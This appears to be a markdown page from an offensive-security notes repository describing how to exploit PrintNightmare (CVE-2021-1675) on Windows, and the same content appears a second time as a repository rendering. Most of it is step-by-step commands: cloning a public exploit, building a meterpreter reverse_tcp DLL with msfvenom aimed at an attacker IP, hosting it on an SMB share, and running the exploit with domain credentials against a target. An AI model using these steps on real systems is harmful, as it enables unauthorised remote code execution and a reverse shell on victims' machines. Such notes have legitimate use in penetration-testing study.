killchain-compendium/Exploits/Windows/PrintNightmare.md

# Print Nightmare

* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)

* Create virtual env inside cloned repo and install impacket
```sh
pip install .
pip2 install .
```

* Create payload
```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
```

* Prepare msf multi handler

* Inside virtualenv
```sh
smbserver share $(pwd) -smb2support
```

* Roll the exploit
```sh
python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Print Nightmare`

			`* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)`

			`* Create virtual env inside cloned repo and install impacket`
			```sh
			`pip install .`
			`pip2 install .`
			```

			`* Create payload`
			```sh
			`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll`
			```

			`* Prepare msf multi handler`

			`* Inside virtualenv`
			```sh
			`smbserver share $(pwd) -smb2support`
			```

			`* Roll the exploit`
			```sh
			`python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'`
			```